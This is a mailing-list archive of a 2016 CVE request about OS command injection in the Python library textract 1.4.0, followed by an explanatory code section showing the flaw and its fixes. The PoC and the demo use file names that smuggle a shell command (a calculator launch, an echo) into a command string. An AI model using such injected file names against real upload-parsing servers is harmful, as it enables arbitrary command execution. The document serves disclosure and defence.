oss-sec mailing list archives
Re: CVE request - textract 1.4.0 - OS Command Injection
From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 17 Nov 2016 09:18:26 -0500
Version 1.5.0 includes a fix for this: https://github.com/deanmalmgren/textract/releases/tag/v1.5.0

On Thu, Oct 20, 2016 at 5:40 PM, Pierre Ernst <pernst () salesforce com> wrote:
The Python textract component (https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection. This fork contains a fix: https://github.com/pierre-ernst/textract

Parsing a file with a malicious name leads to arbitrary OS command injection. This is especially risky when parsing user-supplied files on a server (e.g. uploaded files).

PoC:

import os
import textract

# create a file with a malicious name and arbitrary content;
# the double quote, semicolon and hash in the name are the payload
fileName = './test";gnome-calculator;#.pdf'
with open(fileName, 'w+') as f:
    f.write('Pierre Ernst, Salesforce')

# parse the newly created file; the file name ends up in a shell command
text = textract.process(fileName)
print(text)

# cleanup
os.remove(fileName)

--
Pierre Ernst
Salesforce
--
Pierre Ernst
Senior Application Security Engineer
M&A Security
Salesforce.com
mobile: +1 613-404-1450
timezone: EDT
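The injection the report describes comes from pasting a file name into a shell command string. The following is an added illustration, not code from textract or from the reporter: it rebuilds the same kind of file name with a harmless `echo INJECTED` in place of gnome-calculator, runs it through the risky pattern (string formatting plus shell=True), and then through two fixed variants. The `echo parsing` command stands in for the real converter binary that textract would invoke; that stand-in, the function names and the sample file name are assumptions made for the example.

```python
import shlex
import subprocess

# Constructed sample input, in the shape of the advisory's PoC file name, with
# `echo INJECTED` as an observable stand-in for gnome-calculator.
MALICIOUS_NAME = 'test";echo INJECTED;#.pdf'


def vulnerable_command(filename):
    """Build the command the risky pattern produces: the file name is pasted
    straight into a shell string. `echo parsing` is a stand-in (assumption)
    for the converter binary a library such as textract would call."""
    return 'echo parsing "%s"' % filename


def run_vulnerable(filename):
    """Run the string through /bin/sh. The `"` in the name closes the quoted
    argument, `;` starts a second command and `#` comments out the rest, so
    the attacker's command runs."""
    out = subprocess.run(vulnerable_command(filename), shell=True,
                         capture_output=True, text=True)
    return out.stdout


def run_quoted(filename):
    """Minimal fix if a shell string must be kept: shlex.quote wraps the name
    in single quotes (escaping any embedded ones), so the whole name stays a
    single argument and its metacharacters are never interpreted."""
    cmd = 'echo parsing %s' % shlex.quote(filename)
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def run_argv(filename):
    """Preferred fix: pass an argument list and no shell at all. The name
    reaches the program verbatim as one argv element; nothing parses it."""
    out = subprocess.run(['echo', 'parsing', filename],
                         capture_output=True, text=True)
    return out.stdout


def is_injected(output):
    """True when the injected command actually executed, i.e. INJECTED was
    printed on a line of its own rather than merely echoed inside the name."""
    return 'INJECTED' in output.splitlines()


if __name__ == '__main__':
    print('vulnerable:', repr(run_vulnerable(MALICIOUS_NAME)), is_injected(run_vulnerable(MALICIOUS_NAME)))
    print('quoted:    ', repr(run_quoted(MALICIOUS_NAME)), is_injected(run_quoted(MALICIOUS_NAME)))
    print('argv:      ', repr(run_argv(MALICIOUS_NAME)), is_injected(run_argv(MALICIOUS_NAME)))
```

When checking a converter wrapper for this class of bug, look for shell=True (or os.system / os.popen) combined with string formatting of anything user-influenced, including file names derived from uploads; the argument-list form is the one to reach for, and shlex.quote only helps when the command string is still built by hand.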
Current thread:
- CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)